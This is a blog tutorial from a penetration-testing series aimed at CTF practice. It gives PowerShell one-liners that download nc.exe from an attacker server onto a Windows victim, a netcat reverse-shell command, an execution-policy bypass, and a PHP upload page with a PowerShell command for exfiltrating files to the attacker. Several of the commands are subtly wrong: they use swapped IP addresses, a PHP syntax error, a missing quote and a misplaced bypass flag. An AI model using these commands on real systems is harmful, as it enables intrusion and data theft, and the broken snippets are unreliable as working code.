Powershell For Penetration Testers Downloading And Exfiltrating

This next installment in the Powershell For Penetration Testers looks into how an attacker can introduce files to a victim machine through a PowerShell download, as well as how to use PowerShell to upload files from a victim machine to your attacking box. I recently decided to continue on with this series to help other new comers into the field to learn as I learn. I recently used these skills on a recent Hack The Box machine, which if I remember to, will post the link to the writeup as a practical example.

Downloading Files with PowerShell

Using a PowerShell session, an attacker can quickly download files to a victim machine. There are hundreds of examples more intense then what I will show you, but here are my two methods and go-to’s which I attempt whenever I am performing an attack. In the examples to follow, I will assume that I am attempting to download nc.exe to the victim machine, which I would then plan to use to call a reverse shell back to my attacking machine. I will assume that the victim machine I am attacking is a Windows based Operating System, and I am using Kali Linux as my attacking box. Luckily, PowerShell is installed on all Windows platforms, including Windows IoT Core (hint for the Hack The Box machine).

Please also assume that my Kali Linux has a HTTP server running (This can be Apache, Python’s SimpleHTTPServer, whatever you prefer) and has an IP of 10.10.10.2, where the Windows machine is 10.10.10.1.

Invoke-WebRequest

The first example is a quick one that can easily be remembered, using a PowerShell cmdlet:

powershell -c "mkdir c:\temp & Invoke-WebRequest -URI http://10.10.10.2/nc.exe -OUTFILE c:\temp\nc.exe"

This command first calls PowerShell to run a command with the -c flag. This is shortened from the -Command flag. This also assumes that you are on the machine with a command prompt with remote code execution. Then, the command is actually executed, first making a directory to save our nc.exe binary to. The following command then uses the Invoke-WebRequest cmdlet to download our file from the web server, and saves it to the C:\temp directory.

We could further this command by then calling & c:\temp\nc.exe -e cmd.exe 10.10.10.1 1337 to connect back to our reverse shell (but that is outside of this article) to further our attack as a one-liner.

System.Net.WebClient

However, I frequently find that this is not the preferred method in Hack The Box or other CTF’s to download files to victims. This is from personal experience, where the above failes completely or a binary is not downloaded, or downloading slowly. This brings us to our next approach, using PowerShell’s System.Net.WebClient:

1
powershell -c "mkdir c:\temp & (New-Object System.Net.WebClient).DownloadFile('http://10.10.10.2/nc.exe','C:\temp\nc.exe')"

This is similar to the example above, creating the directory before downloading, only using a .NET class to download.

Remember -ExecutionPolicy Bypasss

Along with PowerShell, remembe that there are sometimes restrictions placed onto the PowerShell session you may be running. I already have an article describing how to beat these execution policies, found here. To make sure that you beat these restricted execution methods, quickly throw a -exec bypass before your download command:

1
powershell -c "-exec bypass mkdir c:\temp & Invoke-WebRequest -URI http://10.10.10.2/nc.exe -OUTFILE c:\temp\nc.exe"

Exfiltrating Data

This is a method where you use a HTML server running on your Kali Linux attacking machine, where PowerShell can upload a file from a victim machine to your Kali. First, we will need to create a PHP page to process our upload request. This can be found here:

1
2
3
4
5
<?php
$uploaddir = '/var/www/uploads';
$uploadfile = '$uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>

Also, make sure that the upload directory exists in your Kali Linux. Once saved and created into our /var/www/html directory as upload.php, start and stop our local Apache processes:

1
2
3
sudo service apache2 status
/etc/init.d/apache2 start
/etc/init.d/apache2 stop

And once running, from the victim box, call the PowerShell command to exfiltrate the data you require:

1
powershell -c "(New-Object System.Net.WebClient).UploadFile('http://10.10.10.1/upload.php, 'file.txt')"

And check your upload directory for the file!

Thank you for reading, please keep coming back for more in this series as nanobyte learns and updates PowerShell For Penetration Testers!